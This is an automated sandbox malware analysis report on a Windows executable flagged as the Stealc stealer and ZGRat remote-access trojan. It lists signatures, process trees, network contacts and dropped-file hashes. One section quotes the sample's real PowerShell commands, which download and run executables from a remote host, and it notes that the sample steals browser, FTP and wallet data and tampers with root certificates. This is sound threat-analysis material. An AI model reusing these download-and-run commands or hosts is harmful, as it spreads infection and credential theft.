Malware Analysis Report

2024-11-15 08:43

Sample ID 240510-bns5zsde97
Target 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
SHA256 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7
Tags

stealc zgrat discovery execution rat spyware stealer

Score

10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

Threat Level: Known bad

The file 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe was found to be: Known bad.

Malicious Activity Summary

stealc zgrat discovery execution rat spyware stealer

Detect ZGRat V1

Stealc

ZGRat

Detects encrypted or obfuscated .NET executables

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Detect binaries embedding considerable number of MFA browser extension IDs.

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Program crash

Unsigned PE

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 01:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win7-20240508-en

Max time kernel

120s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3328 -ip 3328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win7-20240419-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects encrypted or obfuscated .NET executables

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = [blob data elided] C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = [blob data elided] C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data elided] C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data elided] C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data elided] C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\est.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe"

C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe

"C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 d235izp073r941.cloudfront.net udp
GB 108.156.50.216:443 d235izp073r941.cloudfront.net tcp
US 8.8.8.8:53 d2iv78ooxaijb6.cloudfront.net udp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
GB 108.156.32.197:443 d2iv78ooxaijb6.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
DE 185.172.128.90:80 185.172.128.90 tcp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.251:80 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\Cab1EBB.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar1EED.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 512346bd435e73ad2fce7ff08875399e
SHA1 0f0279bdd66f7cdd2f1c803667737d87586a0c23
SHA256 1747cfc629afde110d753d308ed10390a6c7cbf7ec6f640862561a613e6763a2
SHA512 4c5fe1ce4118925688dbbdf537e04fb2b5752ea1ebe0fe08534decbee0b540b21e9e8ec9264e2735eb99b2fe9f7736df7c1093c7ca85f3f45414fb6ce83fbe3c

C:\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\est.bat

MD5 f32d05160acf8325e9a09f09f80d16f4
SHA1 46e159b71e6ef99076c4002e1fda134e1d0a86c9
SHA256 da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37
SHA512 147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

memory/2204-139-0x0000000001C10000-0x0000000001C50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 a19b0219e481a0edfe2dcf75bfb05855
SHA1 fc8884787bd14f29611a1dca769e49734478dbb6
SHA256 6a86f24734f1fd8f4764487ea2b453a9a85f6fc5ae041a2113e2a6f2490f81f2
SHA512 2c6dfa33a4dab6585deb35ba11ff676c9fcc4f30a7384db9b9ad38d7ac3ce27213ba36fb7968eda55d76c928ab13cce4ea800bb6ecebda27820d2f260b431be2

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 e8fe249ed5e4a60afe3b5e0063b2aa1a
SHA1 10136812a9720946b8b3de256bd80464a7c15745
SHA256 a1aa7034c117960e045a7386df698cfaaab3bfd8b13d02bbee56b1e62e67e46f
SHA512 ff212796d65628d63474fa261f648e1b93a974aa1db70bb1edac039de9ed798f5e50debd823b407b208894ed33e320bab1a7275c5649446ff9f8e8b8bac12973

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\u1t4.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/1492-208-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2344-207-0x0000000000400000-0x0000000002B1E000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 e7b69c20dedfdcf2a4fc7483ce52d7ca
SHA1 9b560e705c344b534f19dadc93d53eeb24741950
SHA256 fdd9c6f0feee995899a9b8a8a611ce19a61ce0ae9da648e72ec702b24685454b
SHA512 d5b1a51aa140091feffd67ab8096e979f3c008062dd469d908ffd33e5669629a912f09392f913410f708da32ab4ad7bc666bac3e3fd51b2064e93b73ddbcb513

memory/1492-296-0x0000000000400000-0x0000000002AF1000-memory.dmp

memory/1304-298-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2644-299-0x0000000000EA0000-0x00000000046D4000-memory.dmp

memory/2644-300-0x000000001EEE0000-0x000000001EFEA000-memory.dmp

memory/2644-301-0x0000000000640000-0x0000000000650000-memory.dmp

memory/2644-302-0x00000000006C0000-0x00000000006CC000-memory.dmp

memory/2644-303-0x00000000006B0000-0x00000000006C4000-memory.dmp

memory/2644-304-0x0000000000CA0000-0x0000000000CC4000-memory.dmp

memory/2644-305-0x0000000000E90000-0x0000000000E9A000-memory.dmp

memory/2644-306-0x000000001E120000-0x000000001E14A000-memory.dmp

memory/2644-307-0x000000001E2D0000-0x000000001E382000-memory.dmp

memory/2644-308-0x0000000000660000-0x000000000066A000-memory.dmp

memory/2644-312-0x000000001FD10000-0x0000000020010000-memory.dmp

memory/2644-315-0x0000000000680000-0x000000000068A000-memory.dmp

memory/2644-314-0x0000000000680000-0x000000000068A000-memory.dmp

memory/2644-316-0x0000000000BE0000-0x0000000000BEA000-memory.dmp

memory/2644-317-0x0000000005AE0000-0x0000000005B42000-memory.dmp

memory/2644-318-0x0000000000BF0000-0x0000000000C12000-memory.dmp

memory/2644-321-0x0000000000E50000-0x0000000000E5C000-memory.dmp

memory/2644-325-0x0000000000680000-0x000000000068A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\cb82900d7c0d19605a9c1adc1be5fc0aee77ab3bfdbb4ee40526b56ef2d7a2ce\0c505e714cfb4ebcb371d6c9f825e8f6.tmp

MD5 27b38db6c8dc1964159ce80dd9bfe43d
SHA1 b62e63f790ed5d169ae5c39549fcafaa7b5a44ec
SHA256 c7ea5c83de8fe127d1ce6aa2a4dd236c7bac61c99cee8bdd1ed30a554094fc64
SHA512 c8944c5dcafe406c78c68395614c70edff056c4b89462b327c3809fe65b8a97fd58463a0c4c6a7f810c8bc4274bb5b119a3a548dd5c8ef44f5ef8e56acbc3a96

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

